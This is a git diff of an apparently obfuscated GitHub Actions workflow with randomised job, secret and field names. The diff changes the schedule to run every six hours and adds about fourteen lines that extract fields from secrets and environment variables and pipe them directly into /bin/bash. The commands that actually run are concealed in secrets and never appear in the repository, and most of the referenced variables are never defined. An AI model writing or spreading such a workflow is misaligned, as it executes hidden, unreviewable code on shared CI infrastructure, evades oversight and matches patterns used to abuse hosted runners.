--- a/.github/workflows/niubajiao4328.yml
+++ b/.github/workflows/niubajiao4328.yml
@@ -3,18 +3,28 @@ name: niubajiao4328
 on:
   workflow_dispatch:
   schedule:
-    - cron: '51 0/6 * * *'
+    - cron: '41 5/6 * * *'
 jobs:
   build:
     runs-on: ubuntu-latest
-
     steps:
       - uses: actions/checkout@v4
       - name: niubajiao4328
         env:
-          aeu058: ${{ secrets.aeu058 }}
+          eki571: ${{ secrets.eki571 }}
         run: |
-          echo $aeu058 | jq -r .ksxha49 | /bin/bash
-          echo $owxun2 | jq -r .eieyj4 | /bin/bash
-          echo $pgigp9 | jq -r .oenep948 | /bin/bash
+          echo $eki571 | jq -r .hu832 | /bin/bash
+          echo $cd96178 | jq -r .vno21 | /bin/bash
+          echo $kb50795 | jq -r .v59728 | /bin/bash
+          echo $i88283 | jq -r .gu82 | /bin/bash
+          echo $zmfbk2034 | jq -r .mu44 | /bin/bash
+          echo $bslin424 | jq -r .ebme968 | /bin/bash
+          echo $qw98 | jq -r .unkh34423 | /bin/bash
+          echo $zqvo74875 | jq -r .vqj660 | /bin/bash
+          echo $i030 | jq -r .tkzzd023 | /bin/bash
+          echo $hsknb89 | jq -r .nbuum645 | /bin/bash
+          echo $if851 | jq -r .ffgg932 | /bin/bash
+          echo $i9 | jq -r .epf28877 | /bin/bash
+          echo $bneuj51 | jq -r .ibox74724 | /bin/bash
+          echo $wjwwy5290 | jq -r .w99 | /bin/bash
 
